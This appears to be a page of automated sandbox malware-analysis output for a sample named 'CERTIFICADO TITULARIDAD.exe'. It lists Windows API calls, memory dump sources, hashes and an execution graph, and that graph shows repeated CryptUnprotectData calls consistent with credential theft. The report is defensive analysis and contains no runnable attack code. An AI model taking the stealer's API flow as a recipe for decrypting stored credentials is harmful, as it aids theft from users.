                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                          • Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                                                                          • Instruction ID: 33e626053c854acaf0ea976fdeb40ece7b69d158cb37adfcb571004cb6629101
                                                                                                                          • Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                                                                          • Instruction Fuzzy Hash: 2C11EB7360412877DB00666DAC46EAE329DDF85334F250237FA66F31D5EA79C92242E8
                                                                                                                          APIs
                                                                                                                          • CharNextW.USER32(?,?,Forums.Mel,?,00405F0F,Forums.Mel,Forums.Mel, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe"), ref: 00405EA9
                                                                                                                          • CharNextW.USER32(00000000), ref: 00405EAE
                                                                                                                          • CharNextW.USER32(00000000), ref: 00405EC6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext
                                                                                                                          • String ID: Forums.Mel
                                                                                                                          • API String ID: 3213498283-3454585361
                                                                                                                          • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                                                          • Instruction ID: c4cc3313bff2df52cb6c0caf4e8c88866a305d48728ab5da0ab5d468dade8cef
                                                                                                                          • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                                                          • Instruction Fuzzy Hash: E4F0F631910F2595DA317764CC44E7766B8EB54351B00803BD282B36C1DBF88A819FEA
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405DF6
                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405E00
                                                                                                                          • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E12
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 2659869361-3936084776
                                                                                                                          • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                          • Instruction ID: dcf52917e326d6ada13c2a72ecce68a7b96b6e8782615359caad44c872c99b85
                                                                                                                          • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                          • Instruction Fuzzy Hash: EBD05EB1101634AAC2116B48AC04CDF62AC9E86704381402AF141B20A6C7785D6296ED
                                                                                                                          APIs
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 73F71171
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 73F711E3
                                                                                                                          • GlobalFree.KERNEL32 ref: 73F7124A
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 73F7129B
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 73F712B1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2659336751.0000000073F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F70000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2659279507.0000000073F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2659368168.0000000073F74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2659420622.0000000073F76000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_73f70000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1780285237-0
                                                                                                                          • Opcode ID: 2370cd3d0a5a165bb07a8f8eee4f3b8e5ac76a242cb6c0b193373b53352cc8d5
                                                                                                                          • Instruction ID: 270b13e9fcc16a7eed952747a85b4f42d4948235c8dadcc395b04be183f4349f
                                                                                                                          • Opcode Fuzzy Hash: 2370cd3d0a5a165bb07a8f8eee4f3b8e5ac76a242cb6c0b193373b53352cc8d5
                                                                                                                          • Instruction Fuzzy Hash: 18519BB6900702DFE710EF69C954F2A77F8FB09394B94452AF94ADB260E770E908CB50
                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll), ref: 0040269A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nspD212.tmp$C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll
                                                                                                                          • API String ID: 1659193697-3455269057
                                                                                                                          • Opcode ID: 457cedb22ed2f7019c5e446f23c2104e1a0fd1eea80a96ba194a72848a41722a
                                                                                                                          • Instruction ID: 24c820640bf83c35ca015f911653a3ecbd9f7363fc1a8715c972f2d02b23d4ac
                                                                                                                          • Opcode Fuzzy Hash: 457cedb22ed2f7019c5e446f23c2104e1a0fd1eea80a96ba194a72848a41722a
                                                                                                                          • Instruction Fuzzy Hash: 11113A72A40311BBCB00BBB19E46EAE36709F50748F60443FF402F61C0D6FD4991565E
                                                                                                                          APIs
                                                                                                                          • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                                                                                                          • GetTickCount.KERNEL32 ref: 0040304F
                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2102729457-0
                                                                                                                          • Opcode ID: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
                                                                                                                          • Instruction ID: fc94ebd698381dfc42c8ec832a7b78cf8da54aaf5e1058e2af7a384a9ccf94d3
                                                                                                                          • Opcode Fuzzy Hash: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
                                                                                                                          • Instruction Fuzzy Hash: 0FF05471602621ABC6306F50BD08A9B7E69FB44B53F41087AF045B11A9CB7548828B9C
                                                                                                                          APIs
                                                                                                                          • IsWindowVisible.USER32(?), ref: 00405549
                                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 0040559A
                                                                                                                            • Part of subcall function 004044EC: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                          • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                                                                          • Instruction ID: 85372f17a9103eb01fcdfd8a19690b8d052d76dd043ca16804f8a0d8951f02ed
                                                                                                                          • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                                                                          • Instruction Fuzzy Hash: 53017171200609BFDF309F51DD80AAB362AFB84750F540437FA047A1D5C7B98D52AE69
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(?,76233420,00000000,C:\Users\user\AppData\Local\Temp\,00403B36,00403A4C,?,?,00000008,0000000A,0000000C), ref: 00403B78
                                                                                                                          • GlobalFree.KERNEL32(005205C8), ref: 00403B7F
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B5E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 1100898210-3936084776
                                                                                                                          • Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                                                                          • Instruction ID: 6899552f53244e150386b1952d758f3f927a5bb415edc3c38dc9ad64461d36a3
                                                                                                                          • Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                                                                          • Instruction Fuzzy Hash: 59E08C3250102057CA211F05ED04B1AB7B8AF45B27F06452AE8407B26287B42C838FD8
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe,C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe,80000000,00000003), ref: 00405E42
                                                                                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe,C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe,80000000,00000003), ref: 00405E52
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                          • API String ID: 2709904686-3125694417
                                                                                                                          • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                                                          • Instruction ID: eba18341e72c17137544591cfc51a7e4cac6184970473274e9d14fc4341c5a90
                                                                                                                          • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                                                          • Instruction Fuzzy Hash: 29D0A7F3400A30DAC3127708EC00D9F77ACEF16700746443AE580A7165D7785D818AEC
                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F9E
                                                                                                                          • CharNextA.USER32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FAF
                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 190613189-0
                                                                                                                          • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                                                          • Instruction ID: baa81b9806bcf2d0018ef5e19b9a589e3df5f1c452cb3fab7a363fd504aebd5e
                                                                                                                          • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                                                          • Instruction Fuzzy Hash: 87F0C231105914EFCB029BA5CE00D9EBFA8EF15254B2100BAE840F7250D638DE019BA8

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:7.8%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:11.9%
                                                                                                                          Total number of Nodes:84
                                                                                                                          Total number of Limit Nodes:8
                                                                                                                          execution_graph 66889 3a4896f8 66890 3a4896fa GetCurrentProcess 66889->66890 66892 3a489789 66890->66892 66893 3a489790 GetCurrentThread 66890->66893 66892->66893 66894 3a4897cd GetCurrentProcess 66893->66894 66895 3a4897c6 66893->66895 66896 3a489803 66894->66896 66895->66894 66897 3a48982b GetCurrentThreadId 66896->66897 66898 3a48985c 66897->66898 66899 de018 66900 de024 66899->66900 66907 3a3a7b78 66900->66907 66911 3a3a7b69 66900->66911 66901 de1d4 66915 3a415fd8 66901->66915 66919 3a415fc7 66901->66919 66902 de2e5 66909 3a3a7b9a 66907->66909 66908 3a3a8029 66908->66901 66909->66908 66923 3a3a8431 66909->66923 66913 3a3a7b70 66911->66913 66912 3a3a8029 66912->66901 66913->66912 66914 3a3a8431 CryptUnprotectData 66913->66914 66914->66913 66917 3a415ffa 66915->66917 66916 3a4164c9 66916->66902 66917->66916 66918 3a3a8431 CryptUnprotectData 66917->66918 66918->66917 66921 3a415ffa 66919->66921 66920 3a4164c9 66920->66902 66921->66920 66922 3a3a8431 CryptUnprotectData 66921->66922 66922->66921 66924 3a3a8440 66923->66924 66928 3a3a8a59 66924->66928 66936 3a3a8a68 66924->66936 66925 3a3a84b0 66925->66909 66929 3a3a8a68 66928->66929 66932 3a3a8b41 66929->66932 66934 3a3a8a68 CryptUnprotectData 66929->66934 66935 3a3a8a59 CryptUnprotectData 66929->66935 66944 3a3a8c4a 66929->66944 66948 3a3a87a8 66932->66948 66934->66932 66935->66932 66937 3a3a8a8d 66936->66937 66938 3a3a8b41 66936->66938 66937->66938 66941 3a3a8c4a CryptUnprotectData 66937->66941 66942 3a3a8a68 CryptUnprotectData 66937->66942 66943 3a3a8a59 CryptUnprotectData 66937->66943 66939 3a3a87a8 CryptUnprotectData 66938->66939 66940 3a3a8d0d 66939->66940 66940->66925 66941->66938 66942->66938 66943->66938 66945 3a3a8c5d 66944->66945 66946 3a3a87a8 CryptUnprotectData 66945->66946 66947 3a3a8d0d 66946->66947 66947->66932 66949 3a3a8ef8 CryptUnprotectData 66948->66949 66950 3a3a8d0d 66949->66950 66950->66925 66849 3a574290 66850 3a5742f8 CreateWindowExW 66849->66850 66852 3a5743b4 66850->66852 66852->66852 66853 3a489940 DuplicateHandle 66854 3a4899d6 66853->66854 66855 ad044 66856 ad05c 66855->66856 66857 ad0b6 66856->66857 66861 3a575198 66856->66861 66865 3a574448 66856->66865 66869 3a57186c 66856->66869 66863 3a5751d5 66861->66863 66864 3a5751f9 66863->66864 66873 3a571994 66863->66873 66866 3a57446e 66865->66866 66867 3a57186c CallWindowProcW 66866->66867 66868 3a57448f 66867->66868 66868->66857 66870 3a571877 66869->66870 66871 3a571994 CallWindowProcW 66870->66871 66872 3a5751f9 66870->66872 66871->66872 66874 3a57199f 66873->66874 66875 3a576a6a CallWindowProcW 66874->66875 66876 3a576a19 66874->66876 66875->66876 66876->66864 66877 3a578b98 66878 3a578bc0 66877->66878 66881 3a578bec 66877->66881 66879 3a578bc9 66878->66879 66882 3a578064 66878->66882 66883 3a57806f 66882->66883 66885 3a578ee3 66883->66885 66886 3a578080 66883->66886 66885->66881 66887 3a578f18 OleInitialize 66886->66887 66888 3a578f7c 66887->66888 66888->66885
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.3403097235.0000000039A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_39a20000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: N
                                                                                                                          • API String ID: 0-1130791706
                                                                                                                          • Opcode ID: d4acd28dfbc70571a7f3ca81744483a7da62c33396cd9ae2f94c3433e75f0596
